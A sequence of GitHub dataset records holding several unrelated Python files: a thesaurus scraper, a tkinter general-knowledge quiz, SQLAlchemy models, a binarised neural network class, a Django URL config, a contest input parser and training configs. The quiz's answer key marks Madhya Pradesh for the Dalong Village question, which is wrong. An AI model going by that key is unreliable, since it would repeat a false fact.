open('synonyms_manager.pickle', 'rb') as file:\n return pickle.load(file)\n\n @staticmethod\n def get_instance():\n if SynonymsManager.__instance is None:\n SynonymsManager.__instance = SynonymsManager.load()\n if SynonymsManager.__instance is None:\n SynonymsManager.__instance = SynonymsManager(SynonymsManager.__key)\n return SynonymsManager.__instance\n\n def __init__(self, key):\n if SynonymsManager.__key is not key:\n raise Exception('Singleton not respected')\n self.cache = {}\n\n def synonyms(self, term: str):\n if term.lower() in self.cache.keys():\n return self.cache[term.lower()]\n print(f'*** cerco sinonimo [{term}] ***')\n response = requests.get('https://www.thesaurus.com/browse/{}'.format(term))\n soup = BeautifulSoup(response.text, 'lxml')\n soup.find('section', {'class': 'css-17ofzyv e1ccqdb60'})\n syns = [span.text for span in\n soup.findAll('a',\n {'class': 'css-1kg1yv8 eh475bn0'})] # 'css-1gyuw4i eh475bn0' for less relevant synonyms\n self.cache[term.lower()] = syns\n self.save()\n return syns\n","repo_name":"MrPio/TheSeagullStory","sub_path":"managers/synonyms_manager.py","file_name":"synonyms_manager.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21000217498","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nfrom tkinter import filedialog\nimport shutil,os\nfrom dbaccess import Dbhelper\nimport random\n\nclass Quiz:\n # TO INIATE THE GUI\n\n def __init__(self):\n self._db = Dbhelper()\n self._root = Tk()\n self._root.title(\"QUIZ TESTER\")\n self._root.geometry(\"600x800\")\n self._root.config(background= \"#00C1FF\")\n self._root.resizable(0,0)\n\n self._welcome= Label(self._root,text=\"WELCOME TO QUIZ TESTER\",fg=\"#FF0000\",bg=\"#00C1FF\")\n self._welcome.config(font=(\"Algerian\",30,'bold'))\n self._welcome.pack(pady=(20,20))\n\n imageurl = \"images\\qlogo.png\"\n load = Image.open(imageurl)\n load = load.resize((150, 150), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render, )\n img.image = render\n img.pack(pady=(10,20))\n\n self._name = Label(self._root,text= \"ENTER YOUR NAME\",fg= \"#000\",bg=\"#00C1FF\")\n self._name.config(font=(\"Times\",16))\n self._name.pack(pady=(10,15))\n\n self._nameInput = Entry(self._root)\n self._nameInput.pack(pady=(10,15),ipadx = 70,ipady= 10)\n\n self._email = Label(self._root,text=\"ENTER YOUR EMAIL\",fg= \"#000\",bg=\"#00C1FF\")\n self._email.config(font=(\"Times\",16))\n self._email.pack(pady=(10,15))\n\n self._emailInput = Entry(self._root)\n self._emailInput.pack(pady=(10,15),ipadx=70,ipady=10)\n\n self._enter = Button(self._root,text=\"ENTER\",fg = \"#FFF300\",bg = \"#FF0000\",width= 15,height= 2,command= lambda : self.enter_user())\n self._enter.config(font=(\"Arial\",18))\n self._enter.pack(pady=(10,15))\n\n self._root.mainloop()\n\n\n def clear(self):\n for i in self._root.pack_slaves():\n i.destroy()\n\n# TO REGISTER A NEW USER INTO DATABASE. THE OLD USER DATA WILL NOT BE REGISTERED AGAIN BUT CAN PLAY\n def enter_user(self):\n self._name = self._nameInput.get()\n self._email = self._emailInput.get()\n self.generate()\n self._user_answers = []\n\n if len(self._name)>0 and len(self._email)>0:\n flag = self._db.enter_user(self._name,self._email)\n\n if flag == 1:\n self.clear()\n self.same_user()\n else:\n messagebox.showerror(\"ERROR\",\"SORRY SOMETHING WENT WRONG. PLEASE TRY AGAIN\")\n else:\n messagebox.showerror(\"ERROR\",\"PLEASE GIVE YOUR CORRECT CREDENTIALS\")\n\n# TO LOAD THE INTRODUCTION AND INSTRUCTION PAGE\n def load_quiz_window(self):\n self._readylabel = Label(self._root,text = \"READY TO START ?\",fg= \"#FF0000\",bg=\"#00C1FF\")\n self._readylabel.config(font=(\"Algerian\",30,'bold'))\n self._readylabel.pack(pady=(30,20))\n\n self._introlabel = Label(self._root,fg =\"#FF5100\",bg=\"#00C1FF\")\n self._introlabel.config(text = \"HI \" + str(self._name) + \" ARE YOU READY FOR THE QUIZ TEST ?\",wraplength = 400)\n self._introlabel.config(font=(\"Algerian\",18,'bold'),justify = \"center\")\n self._introlabel.pack(pady=(10,10))\n\n self._readylabel = Label(self._root, text=\"YOUR LAST TIME SCORE WAS \" + str(self.prev_score) + \" WANT TO DO BETTER THIS TIME ? GOOD LUCK !\",fg=\"#B900FF\",bg=\"#00C1FF\",wraplength = 500)\n self._readylabel.config(font=(\"Times\",16,'bold'))\n self._readylabel.pack(pady=(0, 0))\n\n self._followlabel = Label(self._root, text=\"CAREFULLY FOLLOW THE\\n INSTRUCTIONS BEFORE STARTING !\",fg=\"#FF0000\", bg=\"#00C1FF\", justify=\"center\")\n self._followlabel.config(font=(\"Arial\", 16, 'bold'))\n self._followlabel.pack(pady=(10, 20))\n\n self._inst1label = Label(self._root, text=\"1. THERE ARE TOTAL 20 QUESTIONS \\nTHAT YOU HAVE TO ATTEND\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst1label.config(font=(\"Arial\", 15))\n self._inst1label.pack(pady=(20, 10), )\n\n self._inst2label = Label(self._root, text=\" 2. ALL QUESTIONS CONSISTS OF 5 (FIVE)\\n MARKS EACH\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst2label.config(font=(\"Arial\", 15))\n self._inst2label.pack(pady=(8, 10))\n\n self._inst3label = Label(self._root, text=\"3. ALL QUESTIONS ARE COMPULSORY\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst3label.config(font=(\"Arial\", 15))\n self._inst3label.pack(pady=(8, 10))\n\n self._inst4label = Label(self._root, text=\"4. ALL ARE MCQ TYPE QUESTIONS\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst4label.config(font=(\"Arial\", 15))\n self._inst4label.pack(pady=(8, 10))\n\n self._inst5label = Label(self._root, text=\"5. CLICK THE START BUTTON WHEN \\n YOU ARE READY\", fg=\"#000\",bg=\"#00C1FF\", justify=\"left\")\n self._inst5label.config(font=(\"Arial\", 15))\n self._inst5label.pack(pady=(8, 10))\n\n self._start = Button(self._root, text=\"START QUIZ\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.start_quiz())\n self._start.config(font=(\"Arial\", 10))\n self._start.pack(pady=(10, 15))\n# TO SHOW THE PREVIOUS SCORED MARKS OF AN OLD USER AND INSTRUCTION PAGE\n def same_user(self):\n self.x = self._db.same_user(self._name,self._email)\n if self.x[0][0]>0:\n self.prev_score = self.x[0][0]\n self.load_quiz_window()\n else:\n self._readylabel = Label(self._root, text=\"READY TO START ?\", fg=\"#FF0000\", bg=\"#00C1FF\")\n self._readylabel.config(font=(\"Algerian\", 30, 'bold'))\n self._readylabel.pack(pady=(30, 20))\n\n self._introlabel = Label(self._root, fg=\"#FF5100\", bg=\"#00C1FF\")\n self._introlabel.config(text=\"HI \" + str(self._name) + \" ARE YOU READY FOR THE QUIZ TEST ?\", wraplength=400)\n self._introlabel.config(font=(\"Algerian\", 18, 'bold'), justify=\"center\")\n self._introlabel.pack(pady=(10, 10))\n\n self._followlabel = Label(self._root, text=\"CAREFULLY FOLLOW THE\\n INSTRUCTIONS BEFORE STARTING !\",fg=\"#FF0000\", bg=\"#00C1FF\", justify=\"center\")\n self._followlabel.config(font=(\"Arial\", 16, 'bold'))\n self._followlabel.pack(pady=(10, 20))\n\n self._inst1label = Label(self._root, text=\"1. THERE ARE TOTAL 20 QUESTIONS \\nTHAT YOU HAVE TO ATTEND\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst1label.config(font=(\"Arial\", 15))\n self._inst1label.pack(pady=(20, 10), )\n\n self._inst2label = Label(self._root, text=\" 2. ALL QUESTIONS CONSISTS OF 5 (FIVE)\\n MARKS EACH\",fg=\"#000\", bg=\"#00C1FF\", justify=\"left\")\n self._inst2label.config(font=(\"Arial\", 15))\n self._inst2label.pack(pady=(8, 10))\n\n self._inst3label = Label(self._root, text=\"3. ALL QUESTIONS ARE COMPULSORY\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst3label.config(font=(\"Arial\", 15))\n self._inst3label.pack(pady=(8, 10))\n\n self._inst4label = Label(self._root, text=\"4. ALL ARE MCQ TYPE QUESTIONS\", fg=\"#000\", bg=\"#00C1FF\",justify=\"left\")\n self._inst4label.config(font=(\"Arial\", 15))\n self._inst4label.pack(pady=(8, 10))\n\n self._inst5label = Label(self._root, text=\"5. CLICK THE START BUTTON WHEN \\n YOU ARE READY\", fg=\"#000\",bg=\"#00C1FF\", justify=\"left\")\n self._inst5label.config(font=(\"Arial\", 15))\n self._inst5label.pack(pady=(8, 10))\n\n self._start = Button(self._root, text=\"START QUIZ\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.start_quiz())\n self._start.config(font=(\"Arial\", 10))\n self._start.pack(pady=(10, 15))\n# TO LOAD QUESTIONS AND ANSWERS\n def start_quiz(self,i = 0):\n self.clear()\n\n self._questions = [\n \"Q.1. WHO IS THE FIRST PRESIDENT OF INDIA ?\",\n \"Q.2. WHO IS THE FIRST PRESIDENT OF USA ?\",\n \"Q.3. The 'Dalong Village' covering an area of 11.35 sq. km. has recently (May 2017) been declared as Biodiversity Heritage Site under Section 37(1) of Biological Diversity Act, 2002. The village is situated in the Indian State of -\",\n \"Q.4. ........... is the first woman to head a public sector bank.\",\n \"Q.5. World Tourism Day is celebrated on-\",\n \"Q.6. QWhere is Bose Institute?\",\n \"Q.7. When is the International Yoga Day celebrated?\",\n \"Q.8. When Government of India confers the Highest Civilian Honor for Women by presenting Nari Shakti Puraskars ?\",\n \"Q.9. The motif of 'Hampi with Chariot' is printed on the reverse of which currency note?\",\n \"Q.10 Election Commission of India has decided that the voter's identification shall be mandatory in the elections at the time of poll. Which of the following shall be the main document of identification of a voter?\",\n \"Q.11 'Line of Blood' is a book written by whom?\",\n \"Q.12 Which player scored the fastest hat-trick in the Premier League?\",\n \"Q.13 Which player, with 653 games, has made the most Premier League appearances?\",\n \"Q.14 Three players share the record for most Premier League red cards (8). Who are they?\",\n \"Q.15 With 260 goals, who is the Premier League's all-time top scorer?\",\n \"Q.16 When was the inaugural Premier League season?\",\n \"Q.17 Which team won the first Premier League title?\",\n \"Q.18 What's the biggest animal in the world?\",\n \"Q.19 Which country is brie cheese originally from?\",\n \"Q.20 What is the capital of Iceland?\"\n ]\n\n self._answers = [\n [\"RAJENDRA PRASAD\", \"A.P.J ABDUL KALAM\", \"RAMNATH KOVIND\", \"PRANAB MUKHERJEE\"],\n [\"GEORGE WASHINGTON\", \"HITLER\", \"GEORGE BUSH\", \"ABRAHAM LINCOLN\"],\n [\"Manipur\", \"Madhya Pradesh\", \"Mizoram\", \"Maharashtra\"],\n [\"Arundhati Bhattacharya\", \"Shikha Sharma\", \"Chanda Kochar\", \"Usha Ananthasubramanyan\"],\n [\"September 12\", \"September 25\", \"September 27\", \"September 29\"],\n [\" Dispur\", \"Kolkata\", \"Mumbai\", \"New Delhi\"],\n [\"June 21\", \"March 21\", \"April 22\", \"May 31\"],\n [\"June 5\", \"8th March, every year, International Women's Day\", \"June 21\", \"April 7\"],\n [\"One Rupee Note\", \"Rs. 500 note\", \"Rs. 50 note\", \"Rs. 1000 note\"],\n [\"Voter Slip\", \"Electoral Photo Identity Cards (EPIC)\", \"Indelible ink mark\", \"Electoral rolls\"],\n [\"Bairaj Khanna\", \"Ursula Vernon\", \"Amal EI-Mohtar\", \"Diksha Basu\"],\n [\"SADIO MANE\", \"C.RONALDO\", \"D.BECKHAM\", \"LIONEL MESSI\"],\n [\"Gareth Barry\", \"FABIO\", \"GARETH BALE\", \"ASENSIO\"],\n [\"Patrick Vieira,Richard Dunne and Duncan Ferguson\", \"MESSI,RONALDO AND NEYMAR\",\n \"RAMOS, CARVAJAL AND VIDAL\", \"FABIO,ISCO AND BALE\"],\n [\"Alan Shearer\", \"EDEN HAZARD\", \"D.BECKHAM\", \"WAYNE ROONEY\"],\n [\"1992-93\", \"1993-94\", \"1990-91\", \"1998-99\"],\n [\"MANCHESTER UNITED\", \"MANCHESTER CITY\", \"CHELSEA\", \"TOTENHAM\"],\n [\"BLUE WHALE\", \"ELEPHANT\", \"WHITE SHARK\", \"KILLER WHALE\"],\n [\"FRANCE\", \"ITALY\", \"BRAZIL\", \"SPAIN\"],\n [\"Reykjavík\", \"ZURICH\", \"PARIS\", \"QATAR\"]\n ]\n\n self._correct_answers = [0,0,1,0,2,1,0,1,2,1,0,0,0,0,0,0,0,0,0,0]\n\n\n self._question_label = Label(self._root,text = self._questions[self._index[i]],width = 500,justify = \"left\",wraplength = 500,fg = \"#FF0000\",bg = \"#00C1FF\")\n self._question_label.config(font=(\"Arial\",20,'bold'))\n self._question_label.pack(pady=(50,20),padx = (40,40))\n\n self._radio = IntVar()\n self._radio.set(-1)\n\n r1 = Radiobutton(self._root,text = self._answers[self._index[i]][0],variable = self._radio,value = 0,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r1.config(font=(\"Algerian\",18,'bold'))\n r1.pack(pady = (20,50),padx = (50,50))\n\n r2 = Radiobutton(self._root, text= self._answers[self._index[i]][1], variable=self._radio,value = 1,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r2.config(font=(\"Algerian\", 18,'bold'))\n r2.pack(pady=(0, 50), padx=(50,50))\n\n r3 = Radiobutton(self._root, text= self._answers[self._index[i]][2], variable=self._radio,value = 2,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r3.config(font=(\"Algerian\", 18,'bold'))\n r3.pack(pady=(0, 50), padx=(50,50))\n\n r4 = Radiobutton(self._root, text= self._answers[self._index[i]][3], variable=self._radio,value = 3,fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 400,justify = \"center\",command = lambda :self.next_questions(i+1))\n r4.config(font=(\"Algerian\", 18,'bold'))\n r4.pack(pady=(0, 50), padx=(50,50))\n# TO GENERATE RANDOM QUESTION ORDER FOR DIFFERENT USERS\n def generate(self):\n self._index = []\n\n while(len(self._index) < 20):\n x = random.randint(0,19)\n if x in self._index:\n continue\n else:\n self._index.append(x)\n \n\n # TO COLLECT THE ANSWERS FROM USERS\n def next_questions(self,i = 0):\n self._x = self._radio.get()\n self._user_answers.append(self._x)\n\n if i == 0:\n self.clear()\n self.start_quiz(i= 0)\n\n else:\n if i == len(self._index):\n self.calculate_result()\n\n\n else:\n self.clear()\n self.start_quiz(i = i)\n\n# TO CALCULATE THE RESULT\n def calculate_result(self):\n self.clear()\n self._ans_index = 0\n self._score = 0\n\n for i in self._index:\n if self._user_answers[self._ans_index] == self._correct_answers[i]:\n self._score = self._score + 5\n\n self._ans_index = self._ans_index + 1\n\n self.enter_score()\n\n# TO SHOW THE RESULT OF THE USER\n def show_my_result(self):\n\n self._score_label1 = Label(self._root, text=\"END OF QUIZ\", fg=\"#FF00B9\",bg=\"#00C1FF\")\n self._score_label1.config(font=(\"Algerian\", 20,'bold'), justify=\"center\")\n self._score_label1.pack(pady=(50, 10))\n\n\n self._score_label = Label(self._root,text = str(self._name) + \" YOU HAVE SCORED \" + str(self._score) + \" OUT OF 100 MARKS\",fg= \"#FF0000\",bg=\"#00C1FF\",wraplength = 500)\n self._score_label.config(font = (\"Algerian\",20,'bold'),justify = \"center\")\n self._score_label.pack(pady = (20,10))\n\n if self._score >= 80:\n imageurl = \"images\\success.png\"\n load = Image.open(imageurl)\n load = load.resize((300, 300), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render,border = 0)\n img.image = render\n img.pack(pady=(20, 20))\n\n self._score_label1 = Label(self._root, text= \"YOU ARE A GREAT PARTICIPANT. EXCELLENT !\", fg=\"#FF00B9\", bg=\"#00C1FF\")\n self._score_label1.config(font=(\"Algerian\", 18,'bold'), justify=\"center\")\n self._score_label1.pack(pady=(10,10))\n\n self._enter = Button(self._root, text=\"EXIT\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.exit_quiz())\n self._enter.config(font=(\"Arial\", 10))\n self._enter.pack(pady=(10, 15))\n\n elif self._score < 80 and self._score >= 50:\n imageurl = \"images\\medium.jpg\"\n load = Image.open(imageurl)\n load = load.resize((300, 300), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render,border = 0 )\n img.image = render\n img.pack(pady=(20,20))\n\n self._score_label1 = Label(self._root, text=\"YOU ARE A MEDIOCRE PARTICIPANT. NEED MORE PRACTICE TO CRACK !\", fg=\"#FF00B9\",bg=\"#00C1FF\",wraplength = 500)\n self._score_label1.config(font=(\"Algerian\", 18,'bold'), justify=\"center\")\n self._score_label1.pack(pady=(10,10))\n\n self._enter = Button(self._root, text=\"EXIT\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.exit_quiz())\n self._enter.config(font=(\"Arial\", 10))\n self._enter.pack(pady=(10, 15))\n\n else:\n imageurl = \"images\\work.jpeg\"\n load = Image.open(imageurl)\n load = load.resize((300, 300), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(load)\n img = Label(image=render,border = 0)\n img.image = render\n img.pack(pady=(20,20))\n\n self._score_label1 = Label(self._root, text=\"YOU ARE ACTUALLY NOT READY FOR THIS QUIZ TEST. NEED TO WORK HARD !\",fg=\"#FF00B9\", bg=\"#00C1FF\", wraplength=500)\n self._score_label1.config(font=(\"Algerian\", 18,'bold'), justify=\"center\")\n self._score_label1.pack(pady=(10,10))\n\n self._enter = Button(self._root, text=\"EXIT\", fg=\"#FFF300\", bg=\"#FF0000\", width=15, height=2,command=lambda: self.exit_quiz())\n self._enter.config(font=(\"Arial\",10))\n self._enter.pack(pady=(10, 15))\n\n# TO UPDATE THE RESULT SCORED BY USER IN THE DATABASE AGAINST THE USER\n def enter_score(self):\n\n flag = self._db.enter_score(self._score,self._email)\n if flag == 1:\n self.show_my_result()\n else:\n messagebox.showerror(\"ERROR\",\"SORRY SOME PROBLEM OCCURED. PLEASE GIVE ANOTHER TRY\")\n\n# TO EXIT THE QUIZ\n def exit_quiz(self):\n self._root.destroy()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nobj = Quiz()","repo_name":"Chiradeep007/Quiz_App","sub_path":"quiz application.py","file_name":"quiz application.py","file_ext":"py","file_size_in_byte":17638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9968140300","text":"class Matchdict:\n def match_two_dict(self,dict1,dict2):\n count1=0\n for item in dict1.items():\n if item in dict2.items():\n count1 += 1\n print(f'found \\\"{count1}\\\" total number of matched items in two dict: ')\ndict1={'a':1,'b':2,'c':3}\ndict2={'a':4,'b':2,'d':3}\nd1=Matchdict()\nd1.match_two_dict(dict1,dict2)\n","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/oops task/oops_dict/_33_match_keys_values_two_dictionary.py","file_name":"_33_match_keys_values_two_dictionary.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25736600029","text":"from sqlalchemy.orm import declarative_base, relationship\nfrom sqlalchemy import (\n Table,\n Column,\n Integer,\n String,\n DateTime,\n Float,\n Text,\n ForeignKey,\n Boolean,\n)\n\nBase = declarative_base()\n\nCLAIM_NAME_LENGTH = 256\nCLAIM_HASH_LENGTH = 96\nTITLE_LENGTH = 512\nKEY_LENGTH = 512 # Might as well\n\n\nclass Article(Base):\n __tablename__ = \"articles\"\n\n id = Column(Integer, primary_key=True)\n\n manuscripts = relationship(\"Manuscript\", back_populates=\"article\")\n base_claim_name = Column(String(CLAIM_NAME_LENGTH))\n channel_name = Column(String(CLAIM_NAME_LENGTH))\n\n encryption_passphrase = Column(String(1024))\n review_passphrase = Column(String(1024))\n\n reviewed = Column(Boolean())\n revision = Column(Integer())\n\n review_server_id = Column(Integer, ForeignKey(\"servers.id\"))\n review_server = relationship(\"Server\")\n\n @property\n def latest_manuscript(self):\n return self.manuscripts[-1]\n\n @property\n def title(self):\n return self.latest_manuscript.title\n\n @property\n def abstract(self):\n return self.latest_manuscript.abstract\n\n @property\n def authors(self):\n return self.latest_manuscript.authors\n\n @property\n def tags(self):\n return self.latest_manuscript.tags\n\n\nclass Manuscript(Base):\n __tablename__ = \"manuscripts\"\n\n id = Column(Integer, primary_key=True)\n claim_name = Column(String(CLAIM_NAME_LENGTH))\n bid = Column(Float(precision=8))\n file_path = Column(String(512))\n submission_date = Column(DateTime())\n txid = Column(String(40))\n txhash = Column(String(CLAIM_HASH_LENGTH))\n\n title = Column(String(TITLE_LENGTH))\n abstract = Column(Text())\n authors = Column(Text())\n tags = Column(String(1024)) # Tags stored as text\n\n article = relationship(\"Article\")\n article_id = Column(Integer, ForeignKey(\"articles.id\"))\n\n\nclass Review(Base):\n __tablename__ = \"reviews\"\n\n id = Column(Integer, primary_key=True)\n\n # The reviewed manuscript will obviously not be by the user and thus not in the database.\n # The metadata is thus kept here.\n submission_title = Column(String(TITLE_LENGTH))\n submission_claim_name = Column(\n String(CLAIM_NAME_LENGTH)\n ) # Will indicate the revision/version number\n submission_channel_name = Column(String(CLAIM_NAME_LENGTH))\n submission_authors = Column(Text())\n submission_date = Column(DateTime())\n\n review_date = Column(DateTime())\n review_text = Column(Text())\n review_rating = Column(Integer())\n review_signature = Column(Text()) # String\n review_signature_timestamp = Column(Text()) # String\n\n server_id = Column(Integer, ForeignKey(\"servers.id\"))\n server = relationship(\"Server\")\n\n @property\n def is_sent(self):\n if self.review_date:\n return True\n return False\n\n\nclass Server(Base):\n __tablename__ = \"servers\"\n\n id = Column(Integer, primary_key=True)\n\n name = Column(String(512))\n channel_name = Column(String(512))\n url = Column(String(512))\n submitted_reviews = relationship(\"Review\", back_populates=\"server\")\n\n public_key = Column(String(KEY_LENGTH))\n reviewed_articles = relationship(\"Article\", back_populates=\"review_server\")\n\n @property\n def information(self):\n return {\n \"name\": self.name,\n \"channel_name\": self.channel_name,\n \"url\": self.url,\n \"public_key\": self.public_key,\n }\n","repo_name":"PAPR-chain/papr","sub_path":"papr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27256030384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 8 11:18:15 2021\n\n@author: Jannis\n\"\"\"\nimport numpy as np\n\n\nclass BDNN:\n __numNetworks = 0\n \n def __init__(self, layer_widths=[0], bias_terms=True):\n BDNN.__numNetworks +=1\n \n self.__id = BDNN.__numNetworks\n self.__n = layer_widths[0]\n self.__L = len(layer_widths)-1\n self.__widths = layer_widths[:]\n self.__bias = bias_terms\n \n \n self.__matrices = []\n self.__biasVectors = []\n for l in range(self.__L):\n self.__matrices.append(np.zeros((self.__widths[l+1],self.__widths[l]),dtype=float))\n if self.__bias:\n self.__biasVectors.append(np.zeros(self.__widths[l+1],dtype=float))\n \n def getNumLayers(self):\n return self.__L\n \n def getWidthsLayers(self):\n return self.__widths[:]\n \n def hasBiasTerms(self):\n return self.__bias\n \n def printMatrices(self):\n for l in range(self.__L):\n print(self.__matrices[l])\n \n def printBiasVectors(self):\n for l in range(self.__L):\n print(self.__biasVectors[l])\n \n \n def evaluate(self,x):\n c = x[:] \n for l in range(self.__L):\n c = np.dot(self.__matrices[l],c)\n if self.__bias:\n c = c + self.__biasVectors[l]\n c[c>0]=1\n c = np.maximum(c,0)\n \n return c \n \n def predict(self,X):\n y_pred = np.zeros(X.shape[0])\n for i in range(X.shape[0]):\n y_pred[i]=np.argmax(self.evaluate(X[i,:]))\n \n return y_pred\n \n def setBiasVector(self,l,b):\n if b.shape[0]!=self.__biasVectors[l].shape[0]:\n print(\"Error in DNN.setMatrix(): Shapes of Matrices not the same!\")\n else:\n np.copyto(self.__biasVectors[l],b)\n \n def setMatrix(self,l, W):\n if W.shape[0]!=self.__matrices[l].shape[0] or W.shape[1]!=self.__matrices[l].shape[1]:\n print(\"Error in DNN.setMatrix(): Shapes of Matrices not the same!\")\n else:\n np.copyto(self.__matrices[l],W)\n \n def getMatrix(self,l):\n if l.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT }),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"chetweger/tutor-me-english","sub_path":"tutorme/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70084204268","text":"import math\nimport sys\nfrom matplotlib import pyplot\n\n\nclass inputParser:\n def __init__(self, fileName):\n with open(\"input/\" + fileName, \"r\") as file:\n lines = file.readlines()\n dataNodes = [int(node) for node in lines[0].split(\" \")]\n self.data = {\"seconds\": dataNodes[0], \"intersections\": dataNodes[1], \"streets\": dataNodes[2], \"cars\": dataNodes[3], \"bonus\": dataNodes[4]}\n self.streetData = {}\n self.intersectionData = [None] * self.data['intersections']\n self.intersectionCount = 0\n \n for line in lines[1:self.data['streets'] + 1]:\n nodes = line.split(\" \")\n self.streetData[nodes[2]] = {'startInter': int(nodes[0]), 'endInter': int(nodes[1]), 'time': int(nodes[3]), 'count': 0}\n if not self.intersectionData[int(nodes[1])]:\n self.intersectionData[int(nodes[1])] = []\n self.intersectionCount += 1\n\n self.intersectionData[int(nodes[1])].append(nodes[2])\n \n self.carData = []\n \n \n for line in lines[self.data['streets'] + 1:]:\n nodes = line.split()\n self.carData.append({'num': nodes[0], 'streets': nodes[1:]})\n for st in nodes[1:]:\n self.streetData[st]['count'] += 1\n\n def __str__(self):\n string = \"Streets:\\n\"\n for key, elem in self.streetData.items():\n string += key + \": \" + \"Start Intersection: \" + str(elem['startInter']) + \", End Intersection: \" + str(elem['endInter']) + \", Time needed to traverse: \" + str(elem['time']) + \"\\n\"\n string += \"Cars:\\n\"\n for elem in self.carData:\n string += \"Number of streets to cross: \" + str(elem['num']) + \", Path: \" + str(elem['streets']) + \"\\n\"\n return string\n\n\n\nparse = inputParser(sys.argv[1])\n\nfor car in parse.carData:\n print(car['num'])\n\n\n","repo_name":"danmohedano/competitive-programming","sub_path":"hashcode/2021/solutionbeni.py","file_name":"solutionbeni.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42332786368","text":"filepath= \"filename.txt\"\r\narrfile = []\r\n\r\nwith open(filepath, \"r\", encoding=\"utf-8\") as file:\r\n for line in file:\r\n arrfile.append(line.strip())\r\n\r\nimport os\r\nimport shutil\r\n\r\n# Directory paths\r\nsource_directory = 'C:/file/pdf'\r\ndestination_directory = 'C:/file/dest'\r\n\r\n# Function to copy files\r\ndef copy_files(file_list, source_dir, dest_dir):\r\n for file_name in file_list:\r\n source_file_path = os.path.join(source_dir, file_name)\r\n dest_file_path = os.path.join(dest_dir, file_name)\r\n if os.path.exists(source_file_path):\r\n try:\r\n shutil.copyfile(source_file_path, dest_file_path)\r\n print(f\"File '{file_name}' copied successfully.\")\r\n except Exception as e:\r\n print(f\"Error copying '{file_name}': {e}\")\r\n else:\r\n print(f\"File '{file_name}' does not exist in the source directory.\")\r\n\r\n# Call the function\r\ncopy_files(arrfile, source_directory, destination_directory)","repo_name":"Asc2018Uni/file","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36889630708","text":"import json\n\nresult = list()\nwith open('DB.json', 'r') as f:\n data = json.loads(f.read())\n for tmp in data:\n print(tmp)\n if tmp[\"address\"] == \"경기 포천시 이동면 화동로 1925-47\":\n tmp[\"latitude\"] = 127.364518333317\n tmp[\"longitude\"] = 38.0189834254687\n elif tmp[\"address\"] == \"경남 통영시 천대국치길 297-10 (인평동)\":\n tmp[\"latitude\"] = 128.39007097737\n tmp[\"longitude\"] = 34.8385493982446\n elif tmp[\"address\"] == \"전남 함평군 신광면 덕일길 192-91\":\n tmp[\"latitude\"] = 126.509447278409\n tmp[\"longitude\"] = 35.1363395468159\n elif tmp[\"address\"] == \"경기 고양시 덕양구 북한산로387번길 180 (지축동)\":\n tmp[\"latitude\"] = 126.949793353391\n tmp[\"longitude\"] = 37.6671521092109\n else:\n tmp[\"latitude\"] = float(tmp[\"latitude\"].replace(\"4d\", \"\"))\n tmp[\"longitude\"] = float(\n tmp[\"longitude\"].replace(\"3d\", \"\").replace('!', ''))\n result.append(tmp)\n\nwith open('DB_final.json', 'w') as f:\n f.write(json.dumps(result))\n","repo_name":"KwangKwang-untact/Untact-Spot-Server","sub_path":"src/scripts/xylocale.py","file_name":"xylocale.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29775621640","text":"out_dir = 'out-western_robot_gambling'\neval_interval = 250\neval_iters = 200\nlog_interval = 10\n\nalways_save_checkpoint = True\n\ninit_from = 'resume' # 'scratch' or 'resume' or 'gpt2*'\n\ndataset = 'western_robot_gambling'\ngradient_accumulation_steps = 1\nbatch_size = 64\nblock_size = 300 # context of up to 256 previous characters\n\nn_layer = 6\nn_head = 6\nn_embd = 384\ndropout = 0.2\n\nlearning_rate = 1e-4 # with 